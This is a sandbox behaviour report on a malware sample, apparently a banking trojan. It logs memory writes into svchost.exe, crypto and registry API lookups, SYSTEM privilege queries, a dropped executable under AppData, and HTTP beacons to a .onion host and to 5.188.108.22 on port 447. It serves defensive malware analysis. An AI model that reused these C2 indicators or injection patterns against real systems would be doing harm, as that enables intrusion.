| Write | svchost.exe | address = 0x10004008, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 21 |
|
2 | |
| Write | svchost.exe | address = 0x1000400c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
1 | |
| Write | svchost.exe | address = 0x10004010, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004014, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004018, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
2 | |
| Write | svchost.exe | address = 0x1000401c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
2 | |
| Write | svchost.exe | address = 0x10004020, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
4 | |
| Write | svchost.exe | address = 0x10004024, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
2 | |
| Write | svchost.exe | address = 0x10004028, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000402c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004030, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
4 | |
| Write | svchost.exe | address = 0x10004034, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004038, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000403c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
3 | |
| Write | svchost.exe | address = 0x10004040, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004044, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004048, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000404c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004050, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004054, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004058, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000405c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004060, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004064, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 25 |
|
1 | |
| Write | svchost.exe | address = 0x10004068, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000406c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000407c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040b0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004074, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x130000, size = 388 |
|
1 | |
| Write | svchost.exe | address = 0x140000, size = 40 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140000, size = 747 |
|
1 | |
| Write | svchost.exe | address = 0x150000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x1a0000, size = 128 |
|
1 | |
| Write | svchost.exe | address = 0x1c0000, size = 44 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0xa0000, size = 112 |
|
47 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x6cd40000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x6cd41000, size = 5632 |
|
2 | |
| Write | svchost.exe | address = 0x6cd43000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x6cd44000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x6cd45000, size = 36 |
|
1 | |
| Write | svchost.exe | address = 0x6cd46000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x6cd47000, size = 1536 |
|
2 | |
| Write | svchost.exe | address = 0x6cd48000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
3 | |
| Write | svchost.exe | address = 0xb0000, size = 12 |
|
6 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
4 | |
| Write | svchost.exe | address = 0xb0000, size = 16 |
|
37 | |
| Write | svchost.exe | address = 0x6cd47138, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4713c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd47140, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
3 | |
| Write | svchost.exe | address = 0x6cd47144, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
6 | |
| Write | svchost.exe | address = 0x6cd4714c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
5 | |
| Write | svchost.exe | address = 0x6cd47150, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd47154, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
2 | |
| Write | svchost.exe | address = 0x6cd47158, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4715c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
2 | |
| Write | svchost.exe | address = 0x6cd47160, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd47164, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd47168, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4716c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
2 | |
| Write | svchost.exe | address = 0x6cd47170, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
3 | |
| Write | svchost.exe | address = 0x6cd47174, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd47178, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 6 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4717c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
4 | |
| Write | svchost.exe | address = 0x6cd47180, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd47184, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd47188, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4718c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
2 | |
| Write | svchost.exe | address = 0x6cd47194, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 23 |
|
2 | |
| Write | svchost.exe | address = 0x6cd47198, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4719c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 18 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471b4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471c4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd471dc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0xb0000, size = 4 |
|
2 | |
| Write | svchost.exe | address = 0x340000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x350000, size = 388 |
|
1 | |
| Write | svchost.exe | address = 0x360000, size = 40 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x350000, size = 128 |
|
1 | |
| Write | svchost.exe | address = 0x370000, size = 44 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 112 |
|
59 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x6cd40000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x6cd41000, size = 35840 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4a000, size = 6656 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4c000, size = 3072 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4d000, size = 4084 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4e000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4f000, size = 3072 |
|
2 | |
| Write | svchost.exe | address = 0x6cd50000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x6cd51000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x6cd52000, size = 1536 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
3 | |
| Write | svchost.exe | address = 0x120000, size = 12 |
|
3 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
1 | |
| Write | svchost.exe | address = 0x120000, size = 16 |
|
55 | |
| Write | svchost.exe | address = 0x6cd4f224, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
6 | |
| Write | svchost.exe | address = 0x6cd4f22c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4f230, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 21 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4f234, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 18 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f238, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4f23c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f240, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4f244, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f248, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
4 | |
| Write | svchost.exe | address = 0x6cd4f24c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f250, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4f254, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f258, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f25c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f260, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4f264, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4f268, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4f26c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f270, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f274, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f278, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f27c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f280, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f284, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 28 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f288, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 6 |
|
3 | |
| Write | svchost.exe | address = 0x6cd4f28c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f290, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f294, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 25 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f298, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f29c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2b0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4f2b4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 7 |
|
9 | |
| Write | svchost.exe | address = 0x6cd4f2b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2bc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 5 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4f2c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2c4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 8 |
|
2 | |
| Write | svchost.exe | address = 0x6cd4f2c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2dc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2e0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2e4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2e8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2ec, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2f0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2f4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2f8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f2fc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x6cd4f300, size = 4 |
|
1 | |
|
For performance reasons, the remaining 432 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Module (1744)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Crypt32.dll | base_address = 0x75610000 |
|
4 | |
| Load | kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x774c0000 |
|
2 | |
| Load | shell32.dll | base_address = 0x75bb0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77330000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | wtsapi32 | base_address = 0x73f10000 |
|
2 | |
| Load | SHLWAPI.dll | base_address = 0x0 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x0 |
|
1 | |
| Load | bcrypt.dll | base_address = 0x0 |
|
1 | |
| Load | USER32.dll | base_address = 0x0 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x0 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x0 |
|
1 | |
| Load | USERENV.dll | base_address = 0x0 |
|
1 | |
| Load | ncrypt.dll | base_address = 0x0 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | IPHLPAPI.DLL | base_address = 0x0 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x0 |
|
1 | |
| Load | shlwapi | base_address = 0x771d0000 |
|
1 | |
| Get Handle | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | base_address = 0x400000 |
|
5 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
812 | |
| Get Filename | - | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 255 |
|
1 | |
| Get Filename | KERNEL32.dll | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260 |
|
1 | |
| Get Filename | SHELL32.dll | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 512 |
|
1 | |
| Get Filename | SHELL32.dll | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260 |
|
3 | |
| Get Address | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | function = ___CPPdebugHook, address_out = 0x40e13c |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
739 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Borland32, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptStringToBinaryA, address_out = 0x75645d77 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Wow64EnableWow64FsRedirection, address_out = 0x76b98bc9 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x774d469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyW, address_out = 0x774d1514 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExW, address_out = 0x774d468d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegSetValueExW, address_out = 0x774d14d6 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteA, address_out = 0x75df7078 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x774c91dd |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptImportKey, address_out = 0x774cc532 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptEncrypt, address_out = 0x774e779b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x76b62fb6 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memcpy, address_out = 0x77364cc0 |
|
1 | |
| Get Address | c:\windows\system32\wtsapi32.dll | function = WTSEnumerateSessionsA, address_out = 0x73f14023 |
|
2 | |
| Get Address | c:\windows\system32\wtsapi32.dll | function = WTSFreeMemory, address_out = 0x73f11b65 |
|
2 | |
| Get Address | c:\windows\system32\wtsapi32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x0 |
|
2 | |
| Get Address | c:\windows\system32\wtsapi32.dll | function = WTSQueryUserToken, address_out = 0x73f11f81 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SignalObjectAndWait, address_out = 0x76b761d9 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x76b5ba90 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x76b5bcb4 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x76b6214f |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSection, address_out = 0x7738a149 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76b63c01 |
|
65 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = UrlEscapeW, address_out = 0x771e8ca7 |
|
1 |
Service (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
3 |
User (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeTcbPrivilege, luid = 7 |
|
6 | |
| Get Username | user_name_out = SYSTEM |
|
2 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | Squirrel Shootout by Brenton Andrew Saunders | class_name = Squirrel Shootout by Brenton Andrew Saunders, wndproc_parameter = 0 |
|
1 |
Keyboard (21)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_NUMLOCK, result_out = 0 |
|
21 |
System (4128)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = ZGW5TDPU |
|
1 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
778 | |
| Sleep | duration = 50 milliseconds (0.050 seconds) |
|
1 | |
| Sleep | duration = 3 milliseconds (0.003 seconds) |
|
1 | |
| Sleep | duration = 3000 milliseconds (3.000 seconds) |
|
2839 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
3 | |
| Sleep | duration = 20000 milliseconds (20.000 seconds) |
|
105 | |
| Get Time | type = System Time, time = 2019-05-14 15:31:51 (UTC) |
|
3 | |
| Get Time | type = System Time, time = 2019-05-14 15:32:07 (UTC) |
|
3 | |
| Get Time | type = System Time, time = 2019-05-14 15:32:42 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2019-05-14 15:32:43 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 11035760 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:17 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:19 (UTC) |
|
3 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:21 (UTC) |
|
4 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:26 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11047491 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:29 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11050455 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:34 (UTC) |
|
47 | |
| Get Time | type = Ticks, time = 11053606 |
|
3 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:37 (UTC) |
|
9 | |
| Get Time | type = Ticks, time = 11057319 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:42 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:43 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11063653 |
|
3 | |
| Get Time | type = Ticks, time = 11064339 |
|
1 | |
| Get Time | type = Ticks, time = 11064370 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:45 (UTC) |
|
10 | |
| Get Time | type = Ticks, time = 11067724 |
|
1 | |
| Get Time | type = Ticks, time = 11068504 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:51 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:52 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:53 (UTC) |
|
12 | |
| Get Time | type = Ticks, time = 11072810 |
|
2 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:56 (UTC) |
|
13 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:57 (UTC) |
|
13 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:58 (UTC) |
|
13 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:59 (UTC) |
|
13 | |
| Get Time | type = Ticks, time = 11078520 |
|
1 | |
| Get Time | type = Ticks, time = 11078535 |
|
1 | |
| Get Time | type = Ticks, time = 11078660 |
|
2 | |
| Get Time | type = Ticks, time = 11078691 |
|
2 | |
| Get Time | type = Ticks, time = 11078738 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:00 (UTC) |
|
13 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:06 (UTC) |
|
14 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:08 (UTC) |
|
28 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:09 (UTC) |
|
28 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:10 (UTC) |
|
14 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:11 (UTC) |
|
14 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:12 (UTC) |
|
28 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:13 (UTC) |
|
3 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:15 (UTC) |
|
8 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:16 (UTC) |
|
4 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:18 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11097349 |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:34:21 (UTC) |
|
28 | |
| Get Time | type = Ticks, time = 11100282 |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
23 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\C850A606981932960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Network Behavior
DNS (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | name_out = ZgW5tdPu |
|
2 | |
| Resolve Name | host = ZgW5tdPu, address_out = fe80:0000:0000:0000:9594:91b6:d807:49d3, 192.168.0.251 |
|
2 | |
| Resolve Name | host = 91.248.182.84.zen.spamhaus.org, address_out = 127.0.0.10, 127.0.0.4 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 0 |
| Contacted Hosts | - |
TCP Session #1
| Information | Value |
|---|---|
| Remote Address | - |
| Remote Port | 448 |
| Local Address | 192.168.0.251 |
| Local Port | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = cd4fhnyg2337dgxk.onion, server_port = 448 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 5.188.108.22, server_port = 447 |
|
1 | |
